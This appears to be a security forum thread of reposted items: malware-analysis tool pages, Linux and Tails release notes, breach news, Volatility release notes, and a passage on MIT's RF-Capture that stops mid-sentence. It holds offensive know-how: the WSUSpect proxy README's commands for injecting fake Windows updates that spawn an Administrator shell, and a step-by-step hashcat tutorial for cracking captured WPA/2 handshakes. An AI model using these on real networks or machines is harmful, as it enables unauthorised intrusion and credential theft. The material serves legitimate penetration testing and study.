Nytro

There are plenty of tools for behavioral malware analysis. The defacto standard ones, though, are Sysinternals’s Process Monitor (also known as Procmon) and PCAP generating network sniffers like Windump, Tcpdump, Wireshark, and the like. These “two” tools cover almost everything a malware analyst might be interested in when doing behavioral malware analysis.But there’s a major problem with these tools. Any of them works in a so to say separated or isolated way, not knowing anything from each other. Hence it’s kinda hard to get accordingly recorded activities together in one piece or picture. That’s where ProcDOT enters the stage. It fills this actual gap by merging those records together. But ProcDOT does much more. It turns those thousands of monitored activities into a big behavioral picture - actually a graph - which can be interactively explored making behavioral malware analysis as efficient as you it never was before.In this terms ProcDOT enables you to ... •Get an overall guts feeling for an entire situation within a glance, •Spot relevant parts and understand the correlation between them in minutes Sursa: ProcDOT's Home

DensityScout This tool calculates density (like entropy) for files of any file-system-path to finally output an accordingly descending ordered list. This makes it possible to quickly find (even unknown) malware on a potentially infected Microsoft Windows driven machine. Download latest Windows version Download latest Linux version Author Christian Wojner Language English License ISCL [TABLE] [TR] [TD]Releases [/TD] [TD]Changes [/TD] [TD=align: center][/TD] [TD=align: center][/TD] [TD=align: center][/TD] [/TR] [TR] [TD]Build 43[/TD] [TD]Important bugfixes[/TD] [TD=align: center][/TD] [TD=align: center][/TD] [TD=align: center]x[/TD] [/TR] [TR] [TD]Build 42[/TD] [TD]-[/TD] [TD=align: center][/TD] [TD=align: center][/TD] [TD=align: center]x[/TD] [/TR] [/TABLE] Description DensityScout is a tool that has been written for one purpose: finding (possibly unknown) malware on a potentially infected system. Therefore it takes advantage of the typical approach of malware authors to protect their "products" with obfuscation like run-time-packing and -encryption. The tool itself is based on the concept of our Bytehist tool, btw. So what does DensityScout do? DensityScout's main focus is to scan a desired file-system-path by calculating the density of each file to finally print out an accordingly descending list. Usually most Microsoft Windows executables are not packed or encrypted in any way which throws the hits of malicious executables to the top of the list where one can easily focus on. What's Density? Density can also be understood as "entropy". However, the algorithm behind density is not 100% equal to the one which entropy is based on. So we decided to choose a different name. Further thinking ... DensityScout isn't only good for finding malicious executables - it can also be used to find packed or encrypted data-containers and the like! Be aware! For the ones that are already aware of our investigations regarding "The WOW Effect" be warned on doing live-forensics and analysis on 64-Bit Microsoft Windows systems using the 32-Bit version of DensityScout (or/and any other 32-Bit based tool). Use the 64-Bit version instead! The ones of you who do not know what this means exactly, please do read our according paper. Sursa: https://cert.at/downloads/software/densityscout_en.html

Tails 1.7 is out Posted November 3rd, 2015 by tails in Tails, The Amnesic Incognito Live System, version 1.7, is out.This release fixes numerous security issues. All users must upgrade as soon as possible. New features You can now start Tails in offline mode to disable all networking for additional security. Doing so can be useful when working on sensitive documents. We added Icedove, a rebranded version of the Mozilla Thunderbird email client.Icedove is currently a technology preview. It is safe to use in the context of Tails but it will be better integrated in future versions until we remove Claws Mail. Users of Claws Mail should refer to our instructions to migrate their data from Claws Mail to Icedove. Upgrades and changes Improve the wording of the first screen of Tails Installer. Restart Tor automatically if connecting to the Tor network takes too long. (#9516) Update several firmware packages which might improve hardware compatibility. Update the Tails signing key which is now valid until 2017. Update Tor Browser to 5.0.4. Update Tor to 0.2.7.4. Fixed problems Prevent wget from leaking the IP address when using the FTP protocol. (#10364) Prevent symlink attack on ~/.xsession-errors via tails-debugging-info which could be used by the amnesia user to bypass read permissions on any file. (#10333) Force synchronization of data on the USB stick at the end of automatic upgrades. This might fix some reliability bugs in automatic upgrades. Make the "I2P is ready" notification more reliable. Known issues See the current list of known issues. Download or upgrade Go to the download or upgrade page.If you have been updating automatically for a while and your Tails does not boot after an automatic upgrade, you can update your Tails manually. What's coming up? The next Tails release is scheduled for December 15.Have a look at our roadmap to see where we are heading to.We need your help and there are many ways to contribute to Tails (donating is only one of them). Come talk to us! Support and feedback For support and feedback, visit the Support section on the Tails website. Sursa: https://blog.torproject.org/blog/tails-17-out

openSUSE Leap 42.1 Becomes First Hybrid Distribution November 4th, 2015 by Douglas DeMaio Bridging Community and Enterprise The wait is over and a new era begins for openSUSE releases. Contributors, friends and fans can now download the first Linux hybrid distro openSUSE Leap 42.1. Since the last release, exactly one year ago, openSUSE transformed its development process to create an entirely new type of hybrid Linux distribution called openSUSE Leap. Version 42.1 is the first version of openSUSE Leap that uses source from SUSE Linux Enterprise (SLE) providing a level of stability that will prove to be unmatched by other Linux distributions. Bonding community development and enterprise reliability provides more cohesion for the project and its contributor’s maintenance updates. openSUSE Leap will benefit from the enterprise maintenance effort and will have some of the same packages and updates as SLE, which is different from previous openSUSE versions that created separate maintenance streams. Community developers provide an equal level of contribution to Leap and upstream projects to the release, which bridges a gap between matured packages and newer packages found in openSUSE’s other distribution Tumbleweed. Since the move was such a shift from previous versions, a new version number and version naming strategy was adapted to reflect the change. The SLE sources come from SUSE’s soon to be released SLE 12 Service Pack 1 (SP1). The naming strategy is SLE 12 SP1 or 12.1 + 30 = openSUSE Leap 42.1. Many have asked why 42, but SUSE and openSUSE have a tradition of starting big ideas with a four and two, a reference to The Hitchhiker’s Guide to the Galaxy. Every minor version of openSUSE Leap users can expect a new KDE and GNOME, but today is all about openSUSE Leap 42.1, so if you are tired of a brown desktop, try a green one. Have a lot of fun! More info: https://news.opensuse.org/2015/11/04/opensuse-leap-42-1-becomes-first-hybrid-distribution/

Nu permitem astfel de lucruri.

vBulletin Website Offline After Hacker Attack By Eduard Kovacs on November 02, 2015 The developers of the vBulletin forum software have taken down their official website and forum following a hacker attack that may have resulted in user data getting stolen. Users who attempted to access the vBulletin forum on Sunday were greeted by a message that read “Hacked by Coldzer0.” The website and forum currently display a “down for maintenance” message. The extent of the damage is unclear, but the hacker has published screenshots apparently showing that he managed to upload a shell to the vBulletin website and obtain user data, including user IDs, names, email addresses, security questions and answers, and password salts, DataBreaches.net reported. Internet Brands-owned vBulletin Solutions has yet to release a statement on the incident and the company could not immediately be reached for comment. Users should change their passwords as a precaution as soon as the website comes back online. If the same password is used on other websites, it should be changed there as well. The attacker claims to have used a zero-day vulnerability in vBulletin to hack this and other websites powered by the popular forum software. DataBreaches.net has connected the online moniker “Coldzer0” to Mohamed Osama, a malware analyst and security researcher based in Egypt. Osama has removed all references to the vBulletin attack from his social media accounts, and deleted the content of his personal website after his name was linked to the breach. Vulnerabilities in unpatched versions of vBulletin are often leveraged to breach websites using the forum software. In 2013, thousands of websites were hacked via a security hole in vBulletin. Australian security expert Troy Hunt, owner of the Have I Been Pwned service, which allows users to learn if and where their personal data has been compromised, noted that Have I Been Pwned includes data leaked as a result of several vBulletin-powered website breaches. Sursa: vBulletin Website Offline After Hacker Attack | SecurityWeek.Com

Malware Hunting Dat?: mai. 06, 2015 5:00p.m.–6:15p.m. Ziua 3 Arie Crown Theater BRK3319 Vorbitori: Mark Russinovich Mark provides an overview of several Sysinternals tools, including Process Monitor, Process Explorer, Autoruns and the new Sysmon tool, focusing on the features useful for malware analysis and removal. These utilities enable deep inspection and control of processes, file system and registry activity, and autostart execution points. He demonstrates their malware-hunting capabilities by presenting several current, real-world malware samples and using the tools to identify and clean malware. Desc?rca?i Cum pot desc?rca videoclipurile? Pentru desc?rcare, face?i clic dreapta pe tipul de fi?ier dorit ?i alege?i „Save target as” (Salva?i ?inta ca) sau „Save link as” (Salva?i linkul ca). De ce ar trebui s? descarc videoclipuri de la Channel 9? Este o modalitate simpl? de a salva local videoclipurile preferate. Pute?i s? salva?i videoclipurile pentru a le putea urm?ri offline. Dac? dori?i doar s? asculta?i sunetul, pute?i s? desc?rca?i fi?ierul MP3! Ce versiune trebuie s? aleg? Dac? dori?i s? vizualiza?i videoclipul pe PC, Xbox sau Media Center, desc?rca?i fi?ierul MP4 de calitate înalt? (aceasta este versiunea cu calitatea cea mai înalt?). Dac? dori?i o versiune cu o rat? de bi?i mai mic? pentru a reduce timpul ?i costul desc?rc?rii, alege?i fi?ierul MP4 de calitate medie. Dac? ave?i un dispozitiv Windows Phone, iPhone, iPad sau Android, alege?i fi?ierul MP4 de calitate redus? sau medie. Dac? dori?i doar s? auzi?i sunetul videoclipului, alege?i fi?ierul MP3. Face?i clic dreapta pe „Save as (Salvare ca)”. MP4, calitate înalt?(cea mai bun? calitate disponibil?) File size 0,0 B MP4, calitate redus?(aprox. 500-800 kbps) Link: https://channel9.msdn.com/Events/Ignite/2015/BRK3319

WSUSpect Proxy Written by Paul Stone and Alex Chapman, Context Information Security Summary This is a proof of concept script to inject 'fake' updates into non-SSL WSUS traffic. It is based on our Black Hat USA 2015 presentation, 'WSUSpect – Compromising the Windows Enterprise via Windows Update' White paper: http://www.contextis.com/documents/161/CTX_WSUSpect_White_Paper.pdf Slides: http://www.contextis.com/documents/162/WSUSpect_Presentation.pdf Prerequisites You'll need the Python Twisted library installed. You can do this by running: pip install twisted You also need to place a Microsoft-signed binary (e.g. PsExec) into the payloads directory. This script has been tested on Python 2.7. It does not yet work with Python 3.x; contributions are welcome. Usage To test this out, you'll need a target Windows 7 or 8 machine that is configured to receive updates from a WSUS server over unencrypted HTTP. The machine should be configured to proxy through the machine running this script. This can be done by manually changing the proxy settings or via other means such as WPAD poisoning (e.g. using Responder) python wsuspect_proxy.py payload_name [port] An example payload for PsExec is set up that will launch cmd.exe running as Administrator: python wsuspect_proxy.py psexec If you are having problems getting the script to work we'd recommend using a GUI proxy tool such as Burp (and configuring Burp to use this script as a proxy) to see if the update XML is being correctly inserted. Customisation Modify payloads/payloads.ini to change the payloads and their arguments. Known Issues Currently doesn't support Windows 10 targets Doesn't yet support Python 3 Screenshots Sursa: https://github.com/ctxis/wsuspect-proxy

WPA/2 Cracking Using HashCat [ch5pt2] by rootsh3ll | Oct 31, 2015 Hello reader and welcome to part 2 from chapter 5 of the WiFi Security and Pentesting Series. If you remember in the previous part, we learned Speeding up WPA/2 Cracking Using Pre-generated PMKs. Which certainly uses CPU as the primary part for the calculations of the PMKs. It surely gives us speed for cracking as while using PMKs for cracking we are not performing actual calculations in real-time. This brings us to some drawbacks of using PMKs, as follows: SSID Specific. You cannot use PMKs generated for SSID, say “rootsh3ll” for another SSID like “Belkin“. Case-Sensitive. Cannot be used even a single letter is up/lower case. Ex: Won’t work for “Rootsh3ll“ if PMKs are created for “rootsh3ll“. Time used is the same. As processing power of CPU is same in both cases, the time required for creating PMKs are equal even if you crack using Aircrack or creating PMKs(with GenPMK). Huge HD Space required. As we are pre-calculating the PMKs and storing them on HD, it requires a lot of space on your HD and that too for a specific SSID. Which is not an option all the time. Less helpful in today’s scenario. Nowadays routers are being shipped with unique SSID. Ex: Belkin_04A2 for preventing routers from these kind of attacks or atleast delay the cracking duration. You might be thinking now that If this is so, then why would I even consider PMKs for cracking ? Well, as I said above this is Less helpful, that means in some cases. Cases like: Simple SSIDs. Ex: MTNL, Airtel, Linksys etc Before trying any complex task to crack the PSK, if you have PMKs already stored. Give them a shot Mobile numbers are still very common passwords. Still, even if this gives us speed this method is a bit slow. You don’t always have a friend ready to give you a pre-generated PMK file for a specific SSID just when you have captured the handshake, right ? yeah, it’s very rare! Here is when you need to stop using your CPU and test the processing power of you GPU. If you are not aware of using GPUs for cracking purposes let me tell you, Yes GPUs can be used for cracking password hashes and are being used now from a while. There are plenty of tools which uses GPU to boost the cracking speed and lets you crack in way much lesser time that your CPU would have the job finished. Tools like: Pyrit BarsWF HashCat igHashGPU How ? Simple! Your CPU has 2,4,8 cores, means parallel computing units where GPUs have them in thousands, if not hundreds. NOTE: My GeForce GT 525M have 296 cores, and it is pretty old Graphics card, Speed: ~6000 PMK/s. NVidia Titan X is the Best single graphics card with cracking speed up to 2,096,000 hashes/sec. Using GPU for Cracking WPA/2 Passwords Being in the scope of the series we will stick to WPA/2 cracking with GPU in this chapter. For learning difference between CPU and GPU cracking you can visit the following post I’d previously written on FromDev.com. CPU vs. GPU Password Hash Cracking – FromDev.com Tools described above are used for cracking various kinds of passwords. There are 2 tools used for Cracking WPA/2-PSK using GPU from the above list Pyrit HashCat As the post title suggests we will go with HashCat. What is HashCat ? Hashcat is a self-proclaimed command line based world’s fastest password cracker. It is the world’s first and only GPGPU based rule engine and available for Linux, OSX, and Windows free-of-cost. It comes in 2 variants CPU Based GPU Based There is no difference when passing commands to Hashcat because it automatically uses the best method to crack passwords, either CPU or GPU depending on the Graphics driver you have installed or not. Hashcat is fast and extremely flexible- to writer made it in such a way that allows distributed cracking. There are multiple version of HashCat, each optimized and suited for different methods of cracking (dictionary, single hash, distributed etc). I highly recommend Hashcat over Pyrit for its flexibility. Why use HashCat at first place ? As already told above, because of it’s flexibility and vast support of algorithms. But why Hashcat when I just want to crack WPA/2 most of the times ? If you have used or haven’t used Pyrit yet, let me tell you one thing. Pyrit is perhaps the fastest WPA/2 cracker available on the internet but it uses dictionary or wordlist to crack the passwords even if you use PMKs or directly run the cracker you need to have a large amount of dictionaries to test the validity of the hash. For storing hashes you need a lot of disk space. As you can see in the image below, there is a few wordlists that almost take >25 GB on the disk(Extracted), and it take more than 2-3 days to run through them all even with GPU. You can download some useful wordlists here. But most of the times there are some pattern(default passwords) we like to test for validity. Patterns like: Mobile number Date of Birth Default password patterns like “56324FHe“ 10 digit default password by ISP and so on Here is when We have to leave Pyrit with it’s dictionaries and get our hands-on with HashCat. HashCat have a brilliant feature called mask-attack, which allows us to create user-defined patterns to test for password validity and you know what the best thing is ? It requires 0 Bytes on your hard drive. How ? Before we go through this we need to understand that in some cases we need Wordlists. Its only when we are 100% certain that it has some kind of pattern we can use this type of attack. So of you know a certain ISP has 10 random numbers and only a few letters, you could do it to save space on your HD. WPA/2 cracking is a tedious task and uses maximum power of the system when we use Hashcat for the purpose and sometimes it needs to take down the load from the system to switch tasks. hashcat stands best here for it’s remarkable feature. It supports pause/resume while cracking Supports sessions and restore We will see this feature in this tutorial. Keep reading. Supported Attack types Dictionary based attack Brute-force/Mask attack Hybrid dict + mask Hybrid mask + dict Permutation attack Rule-based attack Toggle-case attack These are too name a few. Hashcat supports way too many algorithms to get your hash cracked. NOTE: Traditional Brute-force attack is outdated and is replaced by Mask attack in Hashcat. Wee will see later in this post in details about this. Variants As told above Hashcat comes in 2 vaiants: Hashcat -A CPU based password cracker Oclhashcat/CudaHashcat – GPU accelerated tool Setting up the Lab Installing Graphics driver You have basically 2 choices Install graphics driver in Kali Linux directly, i.e your Pentesting distro. Install graphics driver in Windows or OSX. I have Kali Sana installed in my Virtual machine and unfortunately no virtual machine supports using graphics card or GPU acceleration inside the virtual OS. So I’ll be sticking with Hashcat on windows. You can still do the same task with exact same commands on Kali Linux (or any Linux OS) or OSX with properly installed proprietary drivers. I haven’t written any article on how to install graphics drier in Kali Linux as BlackmoreOps already have a great article on same. so you can follow the links and try installing the same on your version of Kali. NVidia Users: Install proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver Install NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda AMD Users: Install AMD ATI proprietary fglrx driver in Kali Linux 1.x/2.x Install AMD APP SDK in Kali Linux Install CAL++ in Kali Linux Download HashCat You can download Hashcat from it’s official website: http://hashcat.net/ File is highly compressed using 7z compression. So make sure you have atleast 1 GB before extracting the downloaded file. You can use 7zip extractor to decompress the .7z file. Download it here: http://www.7-zip.org/download.html P.S: It is free of use and better than WinRAR. Cleanup your cap file using wpaclean Next step will be converting the .cap file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux will understand. Here’s how to do it: To convert your .cap files manually in Kali Linux, use the following command wpaclean <out.cap> <in.cap> Please note that the wpaclean options are the wrong way round. <out.cap> <in.cap> instead of <in.cap> <out.cap> which may cause some confusion. Convert .cap file to .hccap file Now assuming that you have installed appropriate graphics driver for the selected OS, moving on to the nest step. We need to convert the previously captured handshake i.e .cap file to a format that hashcat could understand and it is .hccap file format. Nothing difficult or time taking. Command to convert .cap to .hccap goes like this aircrack-ng -J <output.hccap> <path/to/.cap file> Here output.hccap is the output filename with .hccap file format and input.cap is the handshake originally captured. Log in to Kali Linux, open Terminal and type: aircrack-ng -J “rootsh3ll-01.hccap” “rootsh3ll-01.cap” Note: rootsh3ll-01.cap is located on Desktop. Check location of your .cap file. Now we have .hccap file, installed graphics driver and downloaded hashcat. Let’s begin the cracking. Cracking WPA/2 Passwords using Hashcat We will cover the following topics: WPA/2 Cracking with Dictionary attack using Hashcat. WPA/2 Cracking with Mask attack using Hashcat. WPA/2 Cracking with Hybrid attack using Hashcat. WPA/2 Cracking Pause/resume in Hashcat (One of the best features) WPA/2 Cracking save sessions and restore. WPA/2 dictionary attack using Hashcat Open cmd and direct it to Hashcat directory, copy .hccap file and wordlists and simply type in cmd cudaHashcat64.exe -m 2500 rootsh3ll-01.hccap wordlist.txt wordlist2.txt Here I have NVidia’s graphics card so I use CudaHashcat command followed by 64, as I am using Windows 10 64-bit version. yours will depend on graphics card you are using and Windows version(32/64). cudaHashcat64.exe – The program, In the same folder theres a cudaHashcat32.exe for 32 bit OS and cudaHashcat32.bin / cudaHashcat64.bin for Linux. oclHashcat*.exe for AMD graphics card. -m 2500 = The specific hashtype. 2500 means WPA/WPA2. In case you forget the WPA2 code for Hashcat. Windows CMD: cudaHashcat64.exe –help | find “WPA” Linux Terminal:cudaHashcat64.bin –help | grep “WPA” It will show you the line containing “WPA” and corresponding code. Handshake-01.hccap = The converted *.cap file. wordlist.txt wordlist2.txt= The wordlists, you can add as many wordlists as you want. To simplify it a bit, every wordlist you make should be saved in the CudaHashcat folder. After executing the command you should see a similar output: Wait for Hashcat to finish the task. You can pass multiple wordlists at once so that Hashcat will keep on testing next wordlist until the password is matched. WPA/2 Mask attack using Hashcat As told earlier, Mask attack is a replacement of the traditional Brute-force attack in Hashcat for better and faster results. let’s have a look at what Mask attack really is. In Terminal/cmd type: cudaHashcat64.exe -m 2500 <rootsh3ll-01.hccap> -a 3 ?d?l?u?d?d?d?u?d?s?a -a 3 is the Attack mode, custom-character set (Mask attack) ?d?l?u?d?d?d?u?d?s?a is the character-set we passed to Hashcat. Let’s understand it in a bit of detail that What is a character set in Hashcat ? Why it is useful ? What is a character set in Hashcat ? ?d ?l ?u ?d ?d ?d ?u ?d ?s ?a = 10 letters and digits long WPA key. Can be 8-63 char long. The above text string is called the “Mask”. Every pair we used in the above examples will translate into the corresponding character that can be an Alphabet/Digit/Special character. For remembering, just see the character used to describe the charset ?d: For digits ?s: For Special characters ?u: For Uppercase alphabets ?l: For Lowercase alphabets ?a: all of the above. Simple! isn’t it ? Here is the actual character set which tells exactly about what characters are included in the list: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 [/TD] [TD=class: crayon-code]?l = abcdefghijklmnopqrstuvwxyz ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d = 0123456789 ?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ ?a = ?l?u?d?s [/TD] [/TR] [/TABLE] Here are a few examples of how the PSK would look like when passed a specific Mask. PSK = ?d?l?u?d?d?d?u?d?s?a 0aC575G2/@ 9zG432H0*K 8sA111W1$4 3wD001Q5+z So now you should have a good understanding of the mask attack, right ? Let’s dig a bit deeper now. Mixing Mask attack with Custom characters. Let’s say, we somehow came to know a part of the password. So, it would be better if we put that part in the attack and randomize the remaining part in Hashcat, isn’t it ? Sure! it is very simple. Just put the desired characters in the place and rest with the Mask. He ?d ?l 123 ?d ?d ?u ?d C is the custom Mask attack we have used. Here assuming that I know the first 2 characters of the original password then setting the 2nd and third character as digit and lowercase letter followed by “123” and then “?d ?d ?u ?d” and finally ending with “C” as I knew already. What we have actually done is that we have simply placed the characters in the exact position we knew and Masked the unknown characters, hence leaving it on to Hashcat to test further. Here is one more example for the same: Let’s say password is “Hi123World” and I just know the “Hi123” part of the password, and remaining are lowercase letters. Assuming length of password to be 10. So I would simply use the command below [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]cudaHashcat64.exe -m 2500 <handshake.hccap> -a 3 Hi123?u?u?u?u?u [/TD] [/TR] [/TABLE] Where ?u will be replaced by lowercase letters, one by one till the password is matched or the possibilities are exhausted. Moving on even further with Mask attack i.r the Hybrid attack. In hybrid attack what we actually do is we don’t pass any specific string to hashcat manually, but automate it by passing a wordlist to Hashcat. Hashcat picks up words one by one and test them to the every password possible by the Mask defined. Example: cudaHashcat64.exe -m 2500 handshake.hccap -a 1 password.txt ?d?l?d?l -a 1 : The hybrid attack password.txt : wordlist ?d?l?d?l = Mask (4 letters and numbers) The wordlist contains 4 words. carlos bigfoot guest onion Now it will use the words and combine it with the defined Mask and output should be this: carlos2e1c bigfoot0h1d guest5p4a onion1h1h It is cool that you can even reverse the order of the mask, means you can simply put the mask before the text file. Hashcat will bruteforce the passwords like this: 7a2ecarlos 8j3abigfoot 0t3wguest 6a5jonion You getting the idea now, right ? Using so many dictionary at one, using long Masks or Hybrid+Masks takes a long time for the task to complete. It is not possible for everyone every time to keep the system on and not use for personal work and the Hashcat developers understands this problem very well. So, they came up with a brilliant solution which no other password recovery tool offers built-in at this moment. That is the Pause/Resume feature WPA/2 Cracking Pause/resume in Hashcat (One of the best features) This feature can be used anywhere in Hashcat. It isn’t just limited to WPA/2 cracking. Even if you are cracking md5, SHA1, OSX, wordpress hashes. As soon as the process is in running state you can pause/resume the process at any moment. Just press [p] to pause the execution and continue your work. To resume press [r]. All the commands are just at the end of the output while task execution. See image below You might sometimes feel this feature as a limitation as you still have to keep the system awake, so that the process doesn’t gets cleared away from the memory. And we have a solution for that too. Create session! WPA/2 Cracking save Sessions and Restore. Creating and restoring sessions with hashcat is Extremely Easy. Just ass –session at the end of the command you want to run followed by the session name. Example: cudaHashcat64.exe -m 2500 rootsh3ll-01.hccap -a 3 Hello?d?l?d?u123?l?l?u –session=blabla Here I named the session “blabla”. You can see in the image below that Hashcat has saved the session with the same name i.e blabla and running. Now you can simply press [q] close cmd, ShutDown System, comeback after a holiday and turn on the system and resume the session. That easy! NOTE: Once execution is completed session will be deleted. How to restore ? Above command – “–restore”. Here it goes: cudaHashcat64.exe -m 2500 rootsh3ll-01.hccap -a 3 Hello?d?l?d?u123?l?l?u –session=blabla –restore Hashcat will now check in its working directory for any session previously created and simply resume the Cracking process. Simple enough ? Yes it is. This is all for Hashcat. Hope you understand it well and performed it along. No need to be sad if you don’t have enough money to purchase those expensive Graphics cards for this purpose you can still try cracking the passwords at high speeds using the clouds. You just have to pay accordingly. Cloud for Cracking WPA/2-PSK You can even leverage cloud for the same purpose. You just have to pay for the service you use as it requires a lot of money, electricity to keep the system up and running and keeping it fast at the same time. A Website that provide the similar service is http://cloudcracker.com/. They charge $17 for 300 Million words in 20 minutes. Which means 250,000 PMK/Second. Sounds nice! isnt it ? Well this is a service so they surely have their part of profit. If you are at a shortage of money you can try even cheaper service. Don’t worry this cheap is actually better than the expensive if you are able to do it accordingly. That is Amazon Elastic Computing 2(EC2) or AWS (Amazon Web Services). Here you need to do all the things manually after logging into the remote host that yo0u have purchased. You have to install the tools and dependencies accordingly and give commands to the master server to perform the cracking. You can aso create upto 1000 instances to distribute the load and increase the cracking speed. Price will change accordingly. But in short let me tell you if you are willing to do this Super Interesting stuff, it will cost you maximum of $1 an hour for even greater speeds than cloudcracker. Here is a video to help you understand better the concept of load distribution and command the master server. Hope you are getting the concept. Here is one more for you to see the cracking process running on Amazon EC2, It’s an old video but worth watch and understand the concept. Forgot to tell you one good news. Amazon EC2 is FREE for first month. It will just ask you for the credit/debit card info as a validation proof. But don’t worry no extra penny will be deducted until you extend to new plan. So I would encourage you to do some research on this specific topic after getting over of Hashcat. It is the real Fun believe me! If you love all this crazy stuff You will love that too. Hope this was helpful enough! Keep Learning. See you in the next chapter with the Aircrack Boost Script! Useful Links: Router: TP-LINK TL-MR3420 300 MB/s Wireless Router 2x 5dBi antennas Network Adapters: Alfa AWUSO36NH High Gain B/G/N USB / Alfa AWUS036NHA B/G/N USB High Gain Antenna: Alfa 9dBi WiFi Omni-Directional High-Gain Antenna USB Drive (32 GB): SanDisk Ultra Fit USB 3.0 32GB Pen Drive Graphics Card NVidia: GeForce GTX TITAN X 12GB (BEST single GPU for Cracking) AMD: Radeon HD 6990 830M 4 GB (3X HD6990 equivalent to 1x-Titan X) [Cheap] Sursa: http://www.rootsh3ll.com/2015/10/rwsps-wpa2-cracking-using-hashcat-cloud-ch5pt2/

Toata lumea trebuie sa stie ce e Volatility.

This is the first release since the publication of The Art of Memory Forensics! It adds support for Windows 10 (initial), Linux kernels 4.2.3, and Mac OS X El Capitan. Additionally, the unified output rendering gives users the flexibility of asking for results in various formats (html, sqlite, json, xlsx, dot, text, etc.) while simplifying things for plugin developers. In short, less code leads to more functionality. This is especially useful for framework designers (GUIs, web interfaces, library APIs), because you can interface with a plugin directly and ask for json, which you then store, process, or modify however you want. This release also coincides with the Community repo - a collection of Volatility plugins written and maintained by authors in the forensics community. Many of these are the result of the last 3 years of Volatility plugin contests, but some were just written for fun. Either way, its an entire arsenal of plugins that you can easily extend into your existing Volatility installation. Released: October 2015 Volatility 2.5 Windows Standalone Executable Volatility 2.5 Mac OS X Standalone Executables Volatility 2.5 Linux Standalone Executables Volatility 2.5 Source Code (.zip) Integrity Hashes View the README View the CREDITS Release Highlights Windows Added profiles for Windows 8.1 Update 1 Added basic support for Windows 10 New plugin to print AmCache information from the registry (amcache) New plugin to dump registry files to disk (dumpregistry) New plugin to detect hidden/unlinked service record structures (servicediff) New plugin to print the shutdown time from the registry (shutdowntime) New plugin to print editbox controls from the GUI subsystem (editbox) Malfind plugin detects injected code with erased PE headers Imagecopy and raw2dmp can display the number of bytes copied or converted Fix an issue with the memmap and memdump offsets being inconsistent Fix an issue with vadtree's graphviz fill colors not being rendered by some viewers Update the well known SIDs reported by the getsids plugin Add an optional --max-size parameter to yarascan, dump_maps, etc Fix an issue translating strings in PAE and x64 images Add options to yarascan for case-insensitive search Add options to yarascan to scan process and kernel memory at once [*] Mac OSX Added profiles and support for Mac 10.10 Yosemite and 10.11 El Capitan New plugin to print and extract compressed swap data (mac_compressed_swap) New plugin to automatically detect Mac OS X profiles (mac_get_profile) New plugin(s) to report Kauth scopes and listeners (mac_list_kauth_scopes | listeners) New plugin to identify applications with promiscuous sockets (mac_list_raw) New plugin to find hidden threads (mac_orphan_threads) New plugin to print process environment variables (mac_psenv) New plugin to print basic and complex thread data (mac_threads, mac_threads_simple) [*] Linux/Android Addd support for Linux kernels up to 4.2.3 New plugin to print Linux dynamic environment variables (linux_dynamic_env) New plugin to print the current working directory of processes (linux_getcwd) New plugin to carve for network connection structures (linux_netscan) Speed improvements to various plugins Improve handling of mprotect() Linux memory regions Operating System Support 64-bit Windows Server 2012 and 2012 R2 32- and 64-bit Windows 10 (initial/basic support) 32- and 64-bit Windows 8, 8.1, and 8.1 Update 1 32- and 64-bit Windows 7 (all service packs) 32- and 64-bit Windows Server 2008 (all service packs) 64-bit Windows Server 2008 R2 (all service packs) 32- and 64-bit Windows Vista (all service packs) 32- and 64-bit Windows Server 2003 (all service packs) 32- and 64-bit Windows XP (SP2 and SP3) 32- and 64-bit Linux kernels from 2.6.11 to 4.2.3 32-bit 10.5.x Leopard (the only 64-bit 10.5 is Server, which isn't supported) 32- and 64-bit 10.6.x Snow Leopard 32- and 64-bit 10.7.x Lion 64-bit 10.8.x Mountain Lion (there is no 32-bit version) 64-bit 10.9.x Mavericks (there is no 32-bit version) 64-bit 10.10.x Yosemite (there is no 32-bit version) 64-bit 10.11.x El Capitan (there is no 32-bit version) Memory Format Support Raw/Padded Physical Memory Firewire (IEEE 1394) Expert Witness (EWF) 32- and 64-bit Windows Crash Dump 32- and 64-bit Windows Hibernation 32- and 64-bit MachO files Virtualbox Core Dumps VMware Saved State (.vmss) and Snapshot (.vmsn) HPAK Format (FastDump) QEMU memory dumps Sursa: http://www.volatilityfoundation.org/#!25/c1f29

Good job!

Researchers use Wi-Fi to see gestures, identify individuals through walls by Lisa Vaas on October 30, 2015 MIT has created a device that can discern where you are, who you are, and which hand you're moving, from the opposite side of a building, through a wall, even though you're invisible to the naked eye. Researchers at MIT's Computer Science and Artificial Intelligence Lab (CSAIL) have long thought it could be possible to use wireless signals like Wi-Fi to see through walls and identify people. The team is now working on a system called RF-Capture that picks up wireless reflections from the human body to see the silhouette of a human standing behind a wall. It's the first system capable of capturing the human figure when the person is fully occluded, MIT said in an announcement on Wednesday. CSAIL researchers have been working to track human movement since 2013. They have already unveiled wireless technologies that can detect gestures and body movements "as subtle as the rise and fall of a person’s chest from the other side of a house," which, MIT says, could enable a mother to monitor a baby’s breathing or a firefighter to determine if there are survivors inside a burning building. RF-Capture's motion-capturing technology can also enable it to call emergency services if it detects that a family member has fallen, according to Dina Katabi, an MIT professor, paper co-author and director of the Wireless@MIT center: We’re working to turn this technology into an in-home device that can call 911 if it detects that a family member has fallen unconscious. The RF-Capture device works by transmitting wireless signals and then reconstructing a human figure by analyzing the signals' reflections. Unlike the emergency-alert wristbands and pendants often worn by the elderly - including the meme-generating "I've fallen and I can't get up" LifeCall devices - people don't need to wear a sensor to be picked up by RF-Capture. The device's transmitting power is 10,000 times lower than that of a standard mobile phone. In a paper accepted to the SIGGRAPH Asia conference taking place next month, the team reports that by tracking a human silhouette, RF-Capture can trace a person’s hand as he writes in the air, determine how a person behind a wall is moving, and even distinguish between 15 different people through a wall, with nearly 90% accuracy. That's just one of many possible uses in a networked, "smart" home, Katabi said: You could also imagine it being used to operate your lights and TVs, or to adjust your heating by monitoring where you are in the house. Beyond tracking the elderly or saving people from burning buildings, MIT also has its eye on Hollywood. PhD student Fadel Adib, lead author on the team's paper, suggested that RF-Capture could be a less clunky way to capture motion than what's now being used: Today actors have to wear markers on their bodies and move in a specific room full of cameras. RF-Capture would enable motion capture without body sensors and could track actors’ movements even if they are behind furniture or walls. RF-Capture analyzes 